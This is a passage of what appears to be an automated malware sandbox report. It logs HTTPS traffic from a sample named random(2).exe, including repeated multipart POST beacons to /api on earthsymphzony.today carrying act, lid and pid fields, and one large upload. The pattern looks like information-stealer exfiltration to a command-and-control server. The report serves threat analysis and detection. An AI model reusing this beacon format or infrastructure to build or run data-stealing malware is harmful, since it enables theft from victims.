                                                                                                      Data Ascii: h49NYe6YGqPPqUZT++ujQwKgcOFckNKNwnzf5O6Dh4i2boxgKttaQ+8pNyf6f4LXcqGVxIjxQikG6F/1Kgbze0ZP7bGv2Hpznym2g2tbE5PCcYGBfOX2zcbpW5DuhWKLB60dwY5sC4fuXUYzP47nQzIR0WH8YVKJNgjfFfoWM4sXD+2xjihaQ18ZFkM7+xNXdjVRsIj0dirGSB8lrqVTuzePjBVPDOvnD7mCRn+Lk1OiceEhzOHyafY432U65oM
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 49 57 76 62 41 6f 44 79 38 7a 43 51 7a 73 62 41 79 4d 69 45 55 47 68 6a 4b 46 79 61 64 62 34 76 36 57 61 78 6c 4f 62 4a 79 38 39 6b 65 37 6f 47 72 4f 2f 4f 66 59 58 2f 32 39 6a 4d 76 62 55 31 63 49 63 77 4a 4e 59 78 6c 7a 65 59 59 73 53 41 2f 73 54 61 6e 6c 78 58 39 69 71 30 2b 2b 5a 74 68 50 4c 65 78 4f 54 45 68 48 78 55 59 79 52 41 72 6a 6d 71 42 39 31 47 6d 62 44 61 77 66 50 7a 61 56 4b 48 41 6f 43 69 38 7a 43 51 54 76 37 73 61 50 43 45 53 58 41 2b 42 42 6d 4b 62 5a 63 32 68 46 71 52 71 4e 4c 52 32 39 74 49 63 35 49 6d 69 4d 66 65 52 5a 7a 6d 31 75 54 30 6c 4a 78 59 53 45 38 4d 54 4a 4a 31 71 6e 2f 46 66 36 43 35 34 75 6d 36 2f 6a 31 54 4f 6a 71 6f 6b 2b 34 51 6b 49 50 61 76 64 44 41 68 56 55 52 51 7a 42 34 74 6e 32 69 41 2f 31 2b 67 59 44 36 34 65 66
                                                                                                      Data Ascii: IWvbAoDy8zCQzsbAyMiEUGhjKFyadb4v6WaxlObJy89ke7oGrO/OfYX/29jMvbU1cIcwJNYxlzeYYsSA/sTanlxX9iq0++ZthPLexOTEhHxUYyRArjmqB91GmbDawfPzaVKHAoCi8zCQTv7saPCESXA+BBmKbZc2hFqRqNLR29tIc5ImiMfeRZzm1uT0lJxYSE8MTJJ1qn/Ff6C54um6/j1TOjqok+4QkIPavdDAhVURQzB4tn2iA/1+gYD64ef
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 6d 65 63 33 38 4e 51 38 66 37 79 38 4f 7a 4d 71 47 52 6f 56 79 52 49 6a 6b 32 69 4e 39 6c 4b 6a 61 54 36 38 65 2f 72 61 45 50 32 4b 72 44 2f 77 6e 57 67 79 2b 50 68 30 4d 44 56 56 52 46 44 2b 45 69 79 53 62 70 75 35 53 65 5a 35 65 4c 70 36 76 34 39 55 37 6f 79 6f 4d 2f 4f 58 5a 7a 36 79 70 43 59 37 4a 42 30 5a 48 4d 51 52 4a 49 35 76 67 76 42 56 71 32 6b 2f 74 58 72 31 31 42 4f 76 7a 75 63 33 35 4e 51 38 66 35 75 68 4a 44 70 74 43 6c 49 4a 6a 78 67 75 33 44 48 4e 38 56 75 67 61 6a 79 36 65 2f 6a 52 48 66 32 4a 6f 6a 37 38 6b 47 38 77 76 72 49 33 4e 7a 38 54 47 42 6a 4d 45 69 2b 53 61 6f 6d 35 47 4f 68 6e 49 50 30 75 76 2b 55 5a 34 5a 75 6f 4e 2b 32 65 4a 43 44 32 72 33 51 77 49 56 56 45 55 4d 73 52 4d 4a 64 6f 68 76 4a 59 72 32 38 39 74 33 62 77 30 78 66
                                                                                                      Data Ascii: mec38NQ8f7y8OzMqGRoVyRIjk2iN9lKjaT68e/raEP2KrD/wnWgy+Ph0MDVVRFD+EiySbpu5SeZ5eLp6v49U7oyoM/OXZz6ypCY7JB0ZHMQRJI5vgvBVq2k/tXr11BOvzuc35NQ8f5uhJDptClIJjxgu3DHN8Vugajy6e/jRHf2Joj78kG8wvrI3Nz8TGBjMEi+Saom5GOhnIP0uv+UZ4ZuoN+2eJCD2r3QwIVVEUMsRMJdohvJYr289t3bw0xf
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 76 47 58 59 6a 6e 34 2b 48 51 77 4e 56 56 45 55 4f 38 45 4c 35 42 75 7a 65 59 59 73 53 41 2f 73 54 61 6e 6c 78 2f 6a 68 4b 41 77 38 5a 64 73 4f 72 79 38 4d 54 63 6c 42 78 51 51 79 41 30 77 6e 47 43 49 39 56 57 6f 5a 44 36 30 63 50 7a 54 56 4b 48 41 6f 43 69 38 7a 43 51 53 74 4c 45 64 4d 44 5a 56 41 31 37 57 58 79 57 51 4b 64 57 35 56 36 4e 71 4e 37 42 31 2b 64 51 66 36 6f 71 6d 4e 2f 53 5a 64 6a 79 33 75 54 41 33 49 68 4d 61 45 63 41 5a 4a 5a 56 6f 68 66 34 57 35 69 41 2f 70 54 61 6e 6c 7a 72 6f 67 36 4e 77 34 39 70 39 66 37 2b 36 64 47 39 74 46 52 59 61 78 52 45 69 6d 33 75 4c 38 46 61 72 63 6a 75 37 66 76 6e 62 47 4f 4b 49 72 6a 44 35 6e 32 6b 30 74 62 41 30 50 43 78 56 55 6c 44 49 42 32 4c 45 4b 62 7a 30 57 4b 78 75 4f 36 31 78 76 38 68 61 39 73 43 67
                                                                                                      Data Ascii: vGXYjn4+HQwNVVEUO8EL5BuzeYYsSA/sTanlx/jhKAw8ZdsOry8MTclBxQQyA0wnGCI9VWoZD60cPzTVKHAoCi8zCQStLEdMDZVA17WXyWQKdW5V6NqN7B1+dQf6oqmN/SZdjy3uTA3IhMaEcAZJZVohf4W5iA/pTanlzrog6Nw49p9f7+6dG9tFRYaxREim3uL8Farcju7fvnbGOKIrjD5n2k0tbA0PCxVUlDIB2LEKbz0WKxuO61xv8ha9sCg
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 78 74 39 76 59 6d 64 33 56 56 57 78 50 64 44 53 53 66 66 34 36 2b 61 4a 5a 48 49 72 42 77 36 4d 59 71 30 59 65 39 50 66 71 44 64 58 4f 74 74 54 6f 35 4b 67 4e 63 58 6f 38 51 59 73 52 51 7a 62 45 57 6c 79 35 34 70 54 61 6e 6c 79 48 73 6a 71 6b 33 36 6f 55 70 47 4b 4b 37 4d 69 41 38 56 56 4a 51 79 56 39 36 7a 69 66 4e 2f 55 66 6f 4f 47 6a 76 4c 61 71 45 51 37 2f 53 75 48 37 6c 31 48 4a 2f 34 4f 52 36 64 7a 39 56 52 46 43 49 48 44 43 4f 62 34 37 76 56 65 39 65 42 70 4e 78 2b 64 49 54 2f 38 4b 4a 4f 2b 69 54 4a 48 48 34 75 58 52 76 46 46 56 55 55 50 42 52 59 6f 51 70 31 62 6c 6a 71 32 34 32 75 6d 44 75 6d 6a 72 6f 68 71 49 33 37 4e 5a 4b 4e 4b 79 78 64 48 6c 74 45 31 78 49 6e 31 46 69 6d 48 6a 4e 6f 51 62 36 4f 32 33 75 49 61 2b 46 43 36 47 5a 35 79 61 38 7a
                                                                                                      Data Ascii: xt9vYmd3VVWxPdDSSff46+aJZHIrBw6MYq0Ye9PfqDdXOttTo5KgNcXo8QYsRQzbEWly54pTanlyHsjqk36oUpGKK7MiA8VVJQyV96zifN/UfoOGjvLaqEQ7/SuH7l1HJ/4OR6dz9VRFCIHDCOb47vVe9eBpNx+dIT/8KJO+iTJHH4uXRvFFVUUPBRYoQp1bljq242umDumjrohqI37NZKNKyxdHltE1xIn1FimHjNoQb6O23uIa+FC6GZ5ya8z
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 32 4f 33 64 31 4c 46 78 59 6a 79 42 73 33 48 48 4e 6f 52 61 64 59 7a 61 7a 63 65 6e 47 57 63 69 4f 6f 44 48 71 68 48 4d 77 2b 50 68 30 4d 57 31 4e 54 6c 36 50 47 7a 50 63 4d 64 32 72 44 66 30 7a 62 2b 30 6b 34 4a 6b 4e 72 35 62 6e 61 4b 37 61 4a 43 33 34 37 6e 52 77 4c 67 63 4f 46 73 77 4a 49 64 74 58 73 39 35 59 72 32 45 75 72 57 48 77 6d 44 72 5a 6f 5a 6b 4f 36 5a 64 71 4d 62 2b 67 4a 58 64 6a 56 52 4e 51 6c 79 5a 69 31 43 6d 79 74 78 61 77 49 47 44 39 51 2f 7a 5a 47 75 69 57 74 6e 33 62 6d 6d 4d 2b 72 71 59 6a 4f 47 49 37 4b 6a 47 50 55 57 4b 61 4b 64 57 72 47 4f 68 6b 4b 66 30 75 72 34 56 50 75 74 50 77 59 4b 36 4c 4b 69 62 34 6f 48 52 76 66 31 74 63 41 6f 39 48 59 74 74 71 6e 2b 74 51 71 33 59 37 2b 6b 6a 42 38 42 72 6f 67 62 45 67 38 5a 68 46 50 4b
                                                                                                      Data Ascii: 2O3d1LFxYjyBs3HHNoRadYzazcenGWciOoDHqhHMw+Ph0MW1NTl6PGzPcMd2rDf0zb+0k4JkNr5bnaK7aJC347nRwLgcOFswJIdtXs95Yr2EurWHwmDrZoZkO6ZdqMb+gJXdjVRNQlyZi1CmytxawIGD9Q/zZGuiWtn3bmmM+rqYjOGI7KjGPUWKaKdWrGOhkKf0ur4VPutPwYK6LKib4oHRvf1tcAo9HYttqn+tQq3Y7+kjB8BrogbEg8ZhFPK
                                                                                                      2025-03-05 08:16:57 UTC1369INData Raw: 62 51 64 63 53 49 39 59 4c 4a 46 6f 6a 76 64 56 75 6e 49 2b 76 6d 44 38 6b 43 72 52 72 62 55 33 37 4a 63 6d 44 72 57 79 49 69 49 75 42 52 73 75 38 54 49 77 6d 33 6d 4f 75 33 71 76 62 54 53 44 53 4d 6a 47 45 2f 2f 43 67 54 50 71 6c 79 52 78 2b 4b 35 30 62 32 30 34 44 68 66 66 48 47 43 77 62 6f 44 31 46 72 63 75 49 66 31 67 76 34 39 48 6f 63 43 31 63 4b 54 55 49 7a 79 71 70 44 49 30 4f 78 5a 62 4c 76 45 79 4d 4a 74 35 6a 72 74 6e 70 57 51 75 71 48 58 76 30 43 72 52 72 62 55 33 37 4a 63 6d 47 6f 4c 30 42 53 45 75 46 52 49 58 6a 31 46 69 68 43 6e 56 75 58 75 36 5a 79 69 2b 4e 4e 72 74 56 74 36 57 70 44 44 79 6b 79 52 78 2b 4c 70 30 62 32 30 59 44 68 66 66 48 47 36 62 63 34 71 35 53 65 5a 35 65 4b 73 32 70 34 52 61 72 35 4c 6e 61 4c 7a 54 61 6a 4b 35 74 54 6f
                                                                                                      Data Ascii: bQdcSI9YLJFojvdVunI+vmD8kCrRrbU37JcmDrWyIiIuBRsu8TIwm3mOu3qvbTSDSMjGE//CgTPqlyRx+K50b204DhffHGCwboD1FrcuIf1gv49HocC1cKTUIzyqpDI0OxZbLvEyMJt5jrtnpWQuqHXv0CrRrbU37JcmGoL0BSEuFRIXj1FihCnVuXu6Zyi+NNrtVt6WpDDykyRx+Lp0b20YDhffHG6bc4q5SeZ5eKs2p4Rar5LnaLzTajK5tTo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.749703104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:16:58 UTC369OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=CH331FBUMJ1X
                                                                                                      Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 12805
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:16:58 UTC12805OUTData Raw: 2d 2d 43 48 33 33 31 46 42 55 4d 4a 31 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 43 48 33 33 31 46 42 55 4d 4a 31 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 43 48 33 33 31 46 42 55 4d 4a 31 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 48 33 33 31 46 42 55 4d 4a 31 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d
                                                                                                      Data Ascii: --CH331FBUMJ1XContent-Disposition: form-data; name="act"send_message--CH331FBUMJ1XContent-Disposition: form-data; name="lid"tw1SlF----CH331FBUMJ1XContent-Disposition: form-data; name="pid"2--CH331FBUMJ1XContent-Disposition: form-
                                                                                                      2025-03-05 08:16:59 UTC831INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 05 Mar 2025 08:16:59 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rqkNaSTbMAK21eWd07%2FclHCB2ZHh5EZAfZk%2BNAyM9cTte3wjnIUGDXWLBHJemrGiaZwFLxwDQWPMxe%2Bm%2FvnqqQxEvhtzsVDuX%2B6ZDj%2FJ84D5964lu%2F5ibVFgufPskvQkRgnUDquiLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 91b82ca10aa34414-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1567&rtt_var=598&sent=9&recv=18&lost=0&retrans=0&sent_bytes=3065&recv_bytes=13832&delivery_rate=2722187&cwnd=189&unsent_bytes=0&cid=351be00af922aea2&ts=569&x=0"
                                                                                                      2025-03-05 08:16:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-03-05 08:16:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.749709104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:17:00 UTC365OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=707WPNS1Q
                                                                                                      Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 6646
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:17:00 UTC6646OUTData Raw: 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 30 37 57 50 4e 53 31 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
                                                                                                      Data Ascii: --707WPNS1QContent-Disposition: form-data; name="act"send_message--707WPNS1QContent-Disposition: form-data; name="lid"tw1SlF----707WPNS1QContent-Disposition: form-data; name="pid"2--707WPNS1QContent-Disposition: form-data; name="
                                                                                                      2025-03-05 08:17:00 UTC822INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 05 Mar 2025 08:17:00 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vDTjMHQxQUsA0YBHi3iKadUbWzcCeOx3Wl1sD2t%2FEysjjJ6QOVy2n8rKr63tPuQwCAJqEmx%2F9f5pK%2F7UjIUZAG2GkGkzLfipt0gIVMph92rjeVRlHRjUHT5eGTF0X9KoCjd3YwMA2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 91b82ca8bc398ca1-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1830&min_rtt=1826&rtt_var=694&sent=8&recv=13&lost=0&retrans=0&sent_bytes=3066&recv_bytes=7647&delivery_rate=2349785&cwnd=184&unsent_bytes=0&cid=1f5b6bf185bf25b4&ts=479&x=0"
                                                                                                      2025-03-05 08:17:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-03-05 08:17:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.749725104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:17:02 UTC371OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=9WX7PLJNJ0A4ZC
                                                                                                      Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20374
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:17:02 UTC15331OUTData Raw: 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 57 58 37 50 4c 4a 4e 4a 30 41 34 5a 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                                                                                      Data Ascii: --9WX7PLJNJ0A4ZCContent-Disposition: form-data; name="act"send_message--9WX7PLJNJ0A4ZCContent-Disposition: form-data; name="lid"tw1SlF----9WX7PLJNJ0A4ZCContent-Disposition: form-data; name="pid"3--9WX7PLJNJ0A4ZCContent-Dispositio
                                                                                                      2025-03-05 08:17:02 UTC5043OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                      2025-03-05 08:17:18 UTC272INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 05 Mar 2025 08:17:18 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Server: cloudflare
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cf-Cache-Status: DYNAMIC
                                                                                                      CF-RAY: 91b82cb73eeb42e9-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2025-03-05 08:17:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-03-05 08:17:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.749834104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:17:19 UTC365OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=EBABCEGLZ
                                                                                                      Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 2301
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:17:19 UTC2301OUTData Raw: 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 42 41 42 43 45 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22
                                                                                                      Data Ascii: --EBABCEGLZContent-Disposition: form-data; name="act"send_message--EBABCEGLZContent-Disposition: form-data; name="lid"tw1SlF----EBABCEGLZContent-Disposition: form-data; name="pid"1--EBABCEGLZContent-Disposition: form-data; name="
                                                                                                      2025-03-05 08:17:19 UTC823INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 05 Mar 2025 08:17:19 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvJR1zORjhlgxrqJQQZWX%2FSxu39OIS4btU2hduefpIyVb2ha4sresvhgOX2zOnjmXHazUcEyEI8V3HAKZBsgnXq6Oreei8FiCwRdVU9HiRruYPw5y%2F3cPDoup%2FasRFhUP8r9VMY%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 91b82d215d5e4414-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1685&rtt_var=636&sent=6&recv=9&lost=0&retrans=0&sent_bytes=3065&recv_bytes=3302&delivery_rate=2570422&cwnd=189&unsent_bytes=0&cid=c1802ea8a779ebf3&ts=443&x=0"
                                                                                                      2025-03-05 08:17:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-03-05 08:17:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.749844104.21.64.14436644C:\Users\user\Desktop\random(2).exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-03-05 08:17:20 UTC376OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=4A1W8BCUKKMJ7AS22F
                                                                                                      Cookie: __cf_mw_byp=Jvx84irDzVb7vzHCdidU.1zL5epcFmVyU0sYK5SbadQ-1741162615-0.0.1.1-/api
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 584009
                                                                                                      Host: earthsymphzony.today
                                                                                                      2025-03-05 08:17:20 UTC15331OUTData Raw: 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 77 31 53 6c 46 2d 2d 0d 0a 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 41 31 57 38 42 43 55 4b 4b 4d 4a 37 41 53 32 32 46 0d 0a 43 6f
                                                                                                      Data Ascii: --4A1W8BCUKKMJ7AS22FContent-Disposition: form-data; name="act"send_message--4A1W8BCUKKMJ7AS22FContent-Disposition: form-data; name="lid"tw1SlF----4A1W8BCUKKMJ7AS22FContent-Disposition: form-data; name="pid"1--4A1W8BCUKKMJ7AS22FCo
